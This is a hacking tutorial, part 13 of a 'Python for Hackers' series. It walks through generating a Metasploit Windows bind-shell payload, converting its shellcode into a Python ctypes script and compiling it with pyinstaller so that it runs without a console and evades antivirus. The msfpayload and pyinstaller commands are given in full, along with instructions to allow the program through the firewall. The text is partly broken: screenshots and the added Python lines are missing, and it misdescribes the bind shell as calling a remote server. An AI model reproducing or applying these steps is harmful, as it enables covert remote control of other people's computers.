
Create Malware Undetectable by Antivirus using Python (Python for Hackers Part - 13)

Antivirus software is designed to detect suspicious files on your system, such as viruses and other malware. However, being able to modify the contents of a piece of malware will enable it to bypass antivirus detection.


In this tutorial you will learn how to create a malicious program using Metasploit, a component of Kali Linux. Metasploit can generate malware, but most antivirus vendors easily recognize its output when it is dropped onto a computer in its original form. To create malware that evades antivirus, you will need to tweak the malware you generate using additional software.

Create Your Malicious Program 


Pull up Kali Linux and launch a terminal. Run this command:

msfpayload -l | more

Doing so will list the payloads that are available for you to use, such as the following:


If you want to bind a shell in order to create a port listener, execute commands on a targeted port, and create your own remote control, enter these commands in the Kali Linux terminal:

msfpayload windows/shell_bind_tcp X > shell.exe

ls -l shell.exe

You will get the following output, which shows that Metasploit has created an executable file named shell.exe, which is your malware: 


Of course, any sensible antivirus software will realize that this is an insecure file which may compromise a target’s computer.

Test Your Malware


To confirm that the .exe file you have created is recognized as malware, transfer it to another computer that has an antivirus program installed, by USB drive, by email, or by dragging it onto the desktop to copy it. Almost immediately, the installed antivirus will catch it and report a detection like this:


Now, if you are going to turn off the antivirus software and run the malware, the command line will display something like this: 


When this happens, you can actually control the Windows machine where the malware is installed using another computer. 

To stop the malware, end the shell.exe file in Task Manager or restart the PC.

Edit the Malware Using Python 


Since your antivirus program can detect the malware you created, you need to edit the malware code in order for it to bypass your computer’s security. To do that, pull up Kali Linux and type this command string in the terminal: 

msfpayload windows/shell_bind_tcp C

You will see the payload you ran earlier printed as C source code containing the shellcode as a hex-encoded byte array. What you need to do is turn this code into an .exe file.


To do this, input the following commands in a Kali Linux terminal:

msfpayload windows/shell_bind_tcp C > shell.py

ls -l shell.py

Upon entering these commands, Kali Linux will generate a file that looks like this:


This code is C, so you will need to edit it into valid Python by adding some lines. To do that, enter this command in the Kali Linux terminal:

nano shell.py

You will get a text editor with this code:


Import ctypes, the standard library module that lets Python call C functions. To do that, add the following line at the beginning of the code:

from ctypes import *

Add the following to the beginning of the first hexadecimal code line:

shellcode = (

After that, remove the following line:

unsigned char buf[] =

Your code in the nano text editor should appear like this:


Scroll down and find the semicolon located near the end of the script. Add a closing parenthesis before it. After doing so, add the following lines at the end of the code: 


You should see this on your screen after doing so:


To save your file, press Ctrl + X, press Y at the prompt, and then press Enter to save your modified file.

Compile the Malware and Run It 


In order to run the modified malware, you will need to compile it first. To do that, pull up a command prompt and run this command:

pyinstaller --onefile --noconsole shell.py

This will create a new folder named "dist". This folder will contain the modified malware, named shell.exe. To run the malware, open the folder and double-click the shell.exe file.


The Windows Firewall might block some of the program's features since it will attempt to connect to a remote server. Bypass that by selecting Allow Access. After doing so, pull up the command prompt and run:

netstat -an | findstr 4444

This will pull up a listening port, which looks like this:


To stop the listener, simply pull up the Task Manager and end the processes named shell.exe.

Check whether your antivirus can still detect the malware you have just created. It should bypass most of the well-known antivirus programs out there.

